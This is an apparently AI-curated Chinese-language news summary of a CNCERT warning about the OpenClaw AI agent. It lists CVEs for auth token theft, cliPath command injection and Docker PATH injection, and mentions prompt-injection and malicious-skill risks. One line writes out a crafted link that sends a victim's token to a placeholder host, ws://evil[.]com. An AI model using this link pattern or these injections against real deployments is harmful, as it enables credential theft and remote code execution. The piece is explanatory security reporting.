🇨🇳TechNode•較早收集於 21m
中國網路應急中心警示 OpenClaw AI 安全風險

💡中國官方警示 OpenClaw 安全薄弱—立即強化你的 AI 代理(政府警示)
⚡ 30-Second TL;DR
有什麼變化
國家電腦網路應急技術處理協調中心於週二發布風險警示
為什麼重要
此警示可能促使中國 OpenClaw 使用者加強配置,在 AI 代理監管加劇下減緩採用率。開發者可能面臨合規壓力。
下一步行動
審核 OpenClaw 預設安全設定,並在使用前啟用更強身份驗證。
誰應關注:Developers & AI Engineers
關鍵要點
- •國家電腦網路應急技術處理協調中心於週二發布風險警示
- •OpenClaw 可透過自然語言指令控制電腦
- •預設安全配置被指較為薄弱
🧠 深度解析
背景與延伸:來自公開資料,非原文內容。引用 8 個來源。
🔑 增強重點摘要
- •SonicWall 發現 CVE-2026-25253 漏洞,CVSS 分數 8.8,允許未經授權遠端攻擊者竊取認證令牌並達成遠端程式碼執行,影響 2026.1.29 之前版本。[1]
- •OpenClaw 閘道預設無認證,憑證以明文儲存於設定檔,資訊竊取惡意軟體如 RedLine 已針對其路徑蒐集資料。[2]
- •ClawHub 技能市場有 283 個技能暴露敏感憑證,Snyk 掃描發現許多技能透過 LLM 上下文視窗明文傳遞 API 金鑰與密碼。[2]
- •CVE-2026-25593 為命令注入漏洞,影響 2026.1.20 之前版本,允許本地未經授權客戶端透過 WebSocket API 注入惡意 cliPath 值。[3]
🛠️ 技術深入
- •CVE-2026-25253 攻擊流程:攻擊者製作惡意連結如 http://
/chat?gatewayUrl=ws://evil[.]com,使用者點擊後 applySettingsFromUrl() 儲存 gatewayUrl,OpenClaw 發送包含認證令牌的 WebSocket 連線框架予攻擊者。[1] - •CVE-2026-25593 機制:攻擊者透過 Gateway WebSocket API 發送 config.apply 請求注入惡意 cliPath,無適當驗證即儲存,命令探索時傳入 shell 執行脈絡導致注入,屬 CWE-78。[3]
- •CVE-2026-24763 為 Docker 沙箱執行機制漏洞,因不安全處理 PATH 環境變數導致命令注入,需認證使用者控制環境變數,影響 2026.1.29 之前版本。[4]
- •安全風險類別包括直接入侵(暴露閘道)、提示注入(惡意指令嵌入內容)、供應鏈攻擊(惡意技能),建議使用反向代理加認證、輸入驗證與技能審核。[5]
🔮 前景展望AI analysis grounded in cited sources
⏳ 時間線
2026-01
早期記錄多項 CVE 漏洞,包括遠端程式碼執行影響 localhost 實例
2026-01
修補 CVE-2026-25593 命令注入漏洞,版本 2026.1.20
2026-01
修補 CVE-2026-24763 Docker 沙箱 PATH 注入漏洞,版本 2026.1.29
2026-01
修補 CVE-2026-25253 認證令牌竊取 RCE 漏洞,版本 2026.1.29
2026-03
中國國家電腦網路應急中心發布 OpenClaw 安全風險警示
📎 來源 (8)
Factual claims are grounded in the sources below. Forward-looking analysis is AI-generated interpretation.
- sonicwall.com — Openclaw Auth Token Theft Leading to Rce Cve 2026 25253
- pacgenesis.com — Openclaw Security Risks What Security Teams Need to Know About AI Agents Like Openclaw in 2026
- sentinelone.com — Cve 2026 25593
- nvd.nist.gov — Cve 2026 24763
- flypix.ai — Openclaw Security Guide
- securityweek.com — Openclaw Vulnerability Allowed Malicious Websites to Hijack AI Agents
- darkreading.com — Critical Openclaw Vulnerability AI Agent Risks
- mastercard.com — Openclaw AI Security Standards
📰
AI 週報
閱讀本週精選 AI 大事摘要 →
👉相關動態
AI 策展新聞聚合。所有內容版權歸原始發布者所有。
原始來源: TechNode ↗
每週 AI 簡報
每週一封,可隨時退訂。